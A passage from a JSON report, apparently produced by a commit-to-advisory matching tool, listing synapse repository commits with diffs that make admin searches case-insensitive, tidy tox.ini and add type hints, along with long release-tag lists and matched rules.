"v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8945, 8945", - "relevance": 32 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8945", - "relevance": 2 - } - ] - }, - { - "commit_id": "06006058d7bf6744078109875cd27f47197aeafa", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608201817, - "hunks": 12, - "message": "Make search statement in List Room and User Admin API case-insensitive (#8931)", - "diff": [ - "diff --git a/changelog.d/8931.feature b/changelog.d/8931.feature", - "new file mode 100644", - "index 000000000..35c720eb8", - "--- /dev/null", - "+++ b/changelog.d/8931.feature", - "@@ -0,0 +1 @@", - "+Make search statement in List Room and List User Admin API case-insensitive.", - "\\ No newline at end of file", - "diff --git a/synapse/storage/databases/main/__init__.py b/synapse/storage/databases/main/__init__.py", - "index 871fb646a..701748f93 100644", - "--- a/synapse/storage/databases/main/__init__.py", - "+++ b/synapse/storage/databases/main/__init__.py", - "@@ -341,8 +341,9 @@ class DataStore(", - "+ # `name` is in database already in lower case", - " if name:", - "- filters.append(\"(name LIKE ? OR displayname LIKE ?)\")", - "- args.extend([\"@%\" + name + \"%:%\", \"%\" + name + \"%\"])", - "+ filters.append(\"(name LIKE ? OR LOWER(displayname) LIKE ?)\")", - "+ args.extend([\"@%\" + name.lower() + \"%:%\", \"%\" + name.lower() + \"%\"])", - " elif user_id:", - " filters.append(\"name LIKE ?\")", - "- args.extend([\"%\" + user_id + \"%\"])", - "+ args.extend([\"%\" + user_id.lower() + \"%\"])", - "diff --git a/synapse/storage/databases/main/room.py b/synapse/storage/databases/main/room.py", - "index 6b89db15c..4650d0689 100644", - "--- a/synapse/storage/databases/main/room.py", - "+++ b/synapse/storage/databases/main/room.py", - "@@ -381,3 +381,3 @@ class RoomWorkerStore(SQLBaseStore):", - " if search_term:", - "- where_statement = \"WHERE state.name LIKE ?\"", - "+ where_statement = \"WHERE LOWER(state.name) LIKE ?\"", - "@@ -388,3 +388,3 @@ class RoomWorkerStore(SQLBaseStore):", - " # before giving it to the database in python instead", - "- search_term = \"%\" + search_term + \"%\"", - "+ search_term = \"%\" + search_term.lower() + \"%\"", - "diff --git a/tests/rest/admin/test_room.py b/tests/rest/admin/test_room.py", - "index ca20bcad0..014c30287 100644", - "--- a/tests/rest/admin/test_room.py", - "+++ b/tests/rest/admin/test_room.py", - "@@ -1052,2 +1052,9 @@ class RoomTestCase(unittest.HomeserverTestCase):", - "+ # Test case insensitive", - "+ _search_test(room_id_1, \"SOMETHING\")", - "+ _search_test(room_id_1, \"THING\")", - "+", - "+ _search_test(room_id_2, \"ELSE\")", - "+ _search_test(room_id_2, \"SE\")", - "+", - " _search_test(None, \"foo\")", - "diff --git a/tests/rest/admin/test_user.py b/tests/rest/admin/test_user.py", - "index df62317e6..4f379a5e5 100644", - "--- a/tests/rest/admin/test_user.py", - "+++ b/tests/rest/admin/test_user.py", - "@@ -20,2 +20,3 @@ import urllib.parse", - " from binascii import unhexlify", - "+from typing import Optional", - "@@ -468,4 +469,8 @@ class UsersListTestCase(unittest.HomeserverTestCase):", - "- self.register_user(\"user1\", \"pass1\", admin=False)", - "- self.register_user(\"user2\", \"pass2\", admin=False)", - "+ self.user1 = self.register_user(", - "+ \"user1\", \"pass1\", admin=False, displayname=\"Name 1\"", - "+ )", - "+ self.user2 = self.register_user(", - "+ \"user2\", \"pass2\", admin=False, displayname=\"Name 2\"", - "+ )", - "@@ -478,3 +483,16 @@ class UsersListTestCase(unittest.HomeserverTestCase):", - " self.assertEqual(401, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", - "- self.assertEqual(\"M_MISSING_TOKEN\", channel.json_body[\"errcode\"])", - "+ self.assertEqual(Codes.MISSING_TOKEN, channel.json_body[\"errcode\"])", - "+", - "+ def test_requester_is_no_admin(self):", - "+ \"\"\"", - "+ If the user is not a server admin, an error is returned.", - "+ \"\"\"", - "+ other_user_token = self.login(\"user1\", \"pass1\")", - "+", - "+ request, channel = self.make_request(", - "+ \"GET\", self.url, access_token=other_user_token,", - "+ )", - "+", - "+ self.assertEqual(403, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", - "+ self.assertEqual(Codes.FORBIDDEN, channel.json_body[\"errcode\"])", - "@@ -495,2 +513,79 @@ class UsersListTestCase(unittest.HomeserverTestCase):", - "+ # Check that all fields are available", - "+ for u in channel.json_body[\"users\"]:", - "+ self.assertIn(\"name\", u)", - "+ self.assertIn(\"is_guest\", u)", - "+ self.assertIn(\"admin\", u)", - "+ self.assertIn(\"user_type\", u)", - "+ self.assertIn(\"deactivated\", u)", - "+ self.assertIn(\"displayname\", u)", - "+ self.assertIn(\"avatar_url\", u)", - "+", - "+ def test_search_term(self):", - "+ \"\"\"Test that searching for a users works correctly\"\"\"", - "+", - "+ def _search_test(", - "+ expected_user_id: Optional[str],", - "+ search_term: str,", - "+ search_field: Optional[str] = \"name\",", - "+ expected_http_code: Optional[int] = 200,", - "+ ):", - "+ \"\"\"Search for a user and check that the returned user's id is a match", - "+", - "+ Args:", - "+ expected_user_id: The user_id expected to be returned by the API. Set", - "+ to None to expect zero results for the search", - "+ search_term: The term to search for user names with", - "+ search_field: Field which is to request: `name` or `user_id`", - "+ expected_http_code: The expected http code for the request", - "+ \"\"\"", - "+ url = self.url + \"?%s=%s\" % (search_field, search_term,)", - "+ request, channel = self.make_request(", - "+ \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", - "+ )", - "+ self.assertEqual(expected_http_code, channel.code, msg=channel.json_body)", - "+", - "+ if expected_http_code != 200:", - "+ return", - "+", - "+ # Check that users were returned", - "+ self.assertTrue(\"users\" in channel.json_body)", - "+ users = channel.json_body[\"users\"]", - "+", - "+ # Check that the expected number of users were returned", - "+ expected_user_count = 1 if expected_user_id else 0", - "+ self.assertEqual(len(users), expected_user_count)", - "+ self.assertEqual(channel.json_body[\"total\"], expected_user_count)", - "+", - "+ if expected_user_id:", - "+ # Check that the first returned user id is correct", - "+ u = users[0]", - "+ self.assertEqual(expected_user_id, u[\"name\"])", - "+", - "+ # Perform search tests", - "+ _search_test(self.user1, \"er1\")", - "+ _search_test(self.user1, \"me 1\")", - "+", - "+ _search_test(self.user2, \"er2\")", - "+ _search_test(self.user2, \"me 2\")", - "+", - "+ _search_test(self.user1, \"er1\", \"user_id\")", - "+ _search_test(self.user2, \"er2\", \"user_id\")", - "+", - "+ # Test case insensitive", - "+ _search_test(self.user1, \"ER1\")", - "+ _search_test(self.user1, \"NAME 1\")", - "+", - "+ _search_test(self.user2, \"ER2\")", - "+ _search_test(self.user2, \"NAME 2\")", - "+", - "+ _search_test(self.user1, \"ER1\", \"user_id\")", - "+ _search_test(self.user2, \"ER2\", \"user_id\")", - "+", - "+ _search_test(None, \"foo\")", - "+ _search_test(None, \"bar\")", - "+", - "+ _search_test(None, \"foo\", \"user_id\")", - "+ _search_test(None, \"bar\", \"user_id\")", - "+", - "diff --git a/tests/storage/test_main.py b/tests/storage/test_main.py", - "index 7e7f1286d..e9e3bca3b 100644", - "--- a/tests/storage/test_main.py", - "+++ b/tests/storage/test_main.py", - "@@ -50 +50,8 @@ class DataStoreTestCase(unittest.TestCase):", - " self.assertEquals(self.displayname, users.pop()[\"displayname\"])", - "+", - "+ users, total = yield defer.ensureDeferred(", - "+ self.store.get_users_paginate(0, 10, name=\"BC\", guests=False)", - "+ )", - "+", - "+ self.assertEquals(1, total)", - "+ self.assertEquals(self.displayname, users.pop()[\"displayname\"])" - ], - "changed_files": [ - "changelog.d/8931.feature", - "synapse/storage/databases/main/__init__.py", - "synapse/storage/databases/main/room.py", - "tests/rest/admin/test_room.py", - "tests/rest/admin/test_user.py", - "tests/storage/test_main.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8931": "" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8931, 8931", - "relevance": 32 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8931", - "relevance": 2 - } - ] - }, - { - "commit_id": "f1db20b5a5c403bb6a72026b2478b0ff6ee3aaee", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608245880, - "hunks": 12, - "message": "Clean up tox.ini (#8963) ... and disable coverage tracking for mypy and friends.", - "diff": [ - "diff --git a/changelog.d/8963.misc b/changelog.d/8963.misc", - "new file mode 100644", - "index 000000000..495d89e8e", - "--- /dev/null", - "+++ b/changelog.d/8963.misc", - "@@ -0,0 +1 @@", - "+Clean up tox.ini file; disable coverage checking for non-test runs.", - "diff --git a/mypy.ini b/mypy.ini", - "index 190420402..0518d3f1a 100644", - "--- a/mypy.ini", - "+++ b/mypy.ini", - "@@ -9,2 +9,7 @@ mypy_path = stubs", - " warn_unreachable = True", - "+", - "+# To find all folders that pass mypy you run:", - "+#", - "+# find synapse/* -type d -not -name __pycache__ -exec bash -c \"mypy '{}' > /dev/null\" \\; -print", - "+", - " files =", - "diff --git a/tox.ini b/tox.ini", - "index c23267682..8e8b49529 100644", - "--- a/tox.ini", - "+++ b/tox.ini", - "@@ -9,3 +9,5 @@ deps =", - " coverage", - "- coverage-enable-subprocess", - "+", - "+ # this is pinned since it's a bit of an obscure package.", - "+ coverage-enable-subprocess==1.0", - "@@ -25,6 +27,2 @@ deps =", - "-setenv =", - "- PYTHONDONTWRITEBYTECODE = no_byte_code", - "- COVERAGE_PROCESS_START = {toxinidir}/.coveragerc", - "-", - " [testenv]", - "@@ -34,8 +32,8 @@ extras = all, test", - "-whitelist_externals =", - "- sh", - "-", - " setenv =", - "- {[base]setenv}", - "+ # use a postgres db for tox environments with \"-postgres\" in the name", - "+ # (see https://tox.readthedocs.io/en/3.20.1/config.html#factors-and-factor-conditional-settings)", - " postgres: SYNAPSE_POSTGRES = 1", - "+", - "+ # this is used by .coveragerc to refer to the top of our tree.", - " TOP={toxinidir}", - "@@ -45,5 +43,17 @@ passenv = *", - " commands =", - "- /usr/bin/find \"{toxinidir}\" -name '*.pyc' -delete", - "- # Add this so that coverage will run on subprocesses", - "- {envbindir}/coverage run \"{envbindir}/trial\" {env:TRIAL_FLAGS:} {posargs:tests} {env:TOXSUFFIX:}", - "+ # the \"env\" invocation enables coverage checking for sub-processes. This is", - "+ # particularly important when running trial with `-j`, since that will make", - "+ # it run tests in a subprocess, whose coverage would otherwise not be", - "+ # tracked. (It also makes an explicit `coverage run` command redundant.)", - "+ #", - "+ # (See https://coverage.readthedocs.io/en/coverage-5.3/subprocess.html.", - "+ # Note that the `coverage.process_startup()` call is done by", - "+ # `coverage-enable-subprocess`.)", - "+ #", - "+ # we use \"env\" rather than putting a value in `setenv` so that it is not", - "+ # inherited by other tox environments.", - "+ #", - "+ # keep this in sync with the copy in `testenv:py35-old`.", - "+ #", - "+ /usr/bin/env COVERAGE_PROCESS_START={toxinidir}/.coveragerc \"{envbindir}/trial\" {env:TRIAL_FLAGS:} {posargs:tests} {env:TOXSUFFIX:}", - "@@ -82,6 +92,5 @@ deps =", - " coverage", - "- coverage-enable-subprocess", - "+ coverage-enable-subprocess==1.0", - " commands =", - "- /usr/bin/find \"{toxinidir}\" -name '*.pyc' -delete", - " # Make all greater-thans equals so we test the oldest version of our direct", - "@@ -94,3 +103,7 @@ commands =", - "- {envbindir}/coverage run \"{envbindir}/trial\" {env:TRIAL_FLAGS:} {posargs:tests} {env:TOXSUFFIX:}", - "+ # we have to duplicate the command from `testenv` rather than refer to it", - "+ # as `{[testenv]commands}`, because we run on ubuntu xenial, which has", - "+ # tox 2.3.1, and https://github.com/tox-dev/tox/issues/208.", - "+ #", - "+ /usr/bin/env COVERAGE_PROCESS_START={toxinidir}/.coveragerc \"{envbindir}/trial\" {env:TRIAL_FLAGS:} {posargs:tests} {env:TOXSUFFIX:}", - "@@ -159,5 +172 @@ extras = all,mypy", - " commands = mypy", - "-", - "-# To find all folders that pass mypy you run:", - "-#", - "-# find synapse/* -type d -not -name __pycache__ -exec bash -c \"mypy '{}' > /dev/null\" \\; -print" - ], - "changed_files": [ - "changelog.d/8963.misc", - "mypy.ini", - "tox.ini" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8963": "" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8963, 8963", - "relevance": 32 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8963", - "relevance": 2 - } - ] - }, - { - "commit_id": "92d87c68824c17e02a8d9e7ca4f9c44b78426cfb", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607353178, - "hunks": 86, - "message": "Add type hints for HTTP and email pushers. (#8880)", - "diff": [ - "diff --git a/changelog.d/8880.misc b/changelog.d/8880.misc", - "new file mode 100644", - "index 000000000..4ff0b94b9", - "--- /dev/null", - "+++ b/changelog.d/8880.misc", - "@@ -0,0 +1 @@", - "+Add type hints to push module.", - "diff --git a/mypy.ini b/mypy.ini", - "index 7ee0dd4b3..59144be46 100644", - "--- a/mypy.ini", - "+++ b/mypy.ini", - "@@ -57,3 +57,6 @@ files =", - " synapse/notifier.py,", - "+ synapse/push/emailpusher.py,", - "+ synapse/push/httppusher.py,", - " synapse/push/mailer.py,", - "+ synapse/push/pusher.py,", - " synapse/push/pusherpool.py,", - "diff --git a/synapse/push/__init__.py b/synapse/push/__init__.py", - "index e462fb2e1..3d2e87483 100644", - "--- a/synapse/push/__init__.py", - "+++ b/synapse/push/__init__.py", - "@@ -15,2 +15,52 @@", - "+import abc", - "+from typing import TYPE_CHECKING, Any, Dict, Optional", - "+", - "+from synapse.types import RoomStreamToken", - "+", - "+if TYPE_CHECKING:", - "+ from synapse.app.homeserver import HomeServer", - "+", - "+", - "+class Pusher(metaclass=abc.ABCMeta):", - "+ def __init__(self, hs: \"HomeServer\", pusherdict: Dict[str, Any]):", - "+ self.hs = hs", - "+ self.store = self.hs.get_datastore()", - "+ self.clock = self.hs.get_clock()", - "+", - "+ self.pusher_id = pusherdict[\"id\"]", - "+ self.user_id = pusherdict[\"user_name\"]", - "+ self.app_id = pusherdict[\"app_id\"]", - "+ self.pushkey = pusherdict[\"pushkey\"]", - "+", - "+ # This is the highest stream ordering we know it's safe to process.", - "+ # When new events arrive, we'll be given a window of new events: we", - "+ # should honour this rather than just looking for anything higher", - "+ # because of potential out-of-order event serialisation. This starts", - "+ # off as None though as we don't know any better.", - "+ self.max_stream_ordering = None # type: Optional[int]", - "+", - "+ @abc.abstractmethod", - "+ def on_new_notifications(self, max_token: RoomStreamToken) -> None:", - "+ raise NotImplementedError()", - "+", - "+ @abc.abstractmethod", - "+ def on_new_receipts(self, min_stream_id: int, max_stream_id: int) -> None:", - "+ raise NotImplementedError()", - "+", - "+ @abc.abstractmethod", - "+ def on_started(self, have_notifs: bool) -> None:", - "+ \"\"\"Called when this pusher has been started.", - "+", - "+ Args:", - "+ should_check_for_notifs: Whether we should immediately", - "+ check for push to send. Set to False only if it's known there", - "+ is nothing to send", - "+ \"\"\"", - "+ raise NotImplementedError()", - "+", - "+ @abc.abstractmethod", - "+ def on_stop(self) -> None:", - "+ raise NotImplementedError()", - "+", - "diff --git a/synapse/push/emailpusher.py b/synapse/push/emailpusher.py", - "index c6763971e..64a35c199 100644", - "--- a/synapse/push/emailpusher.py", - "+++ b/synapse/push/emailpusher.py", - "@@ -16,3 +16,5 @@", - " import logging", - "+from typing import TYPE_CHECKING, Any, Dict, List, Optional", - "+from twisted.internet.base import DelayedCall", - " from twisted.internet.error import AlreadyCalled, AlreadyCancelled", - "@@ -20,4 +22,9 @@ from twisted.internet.error import AlreadyCalled, 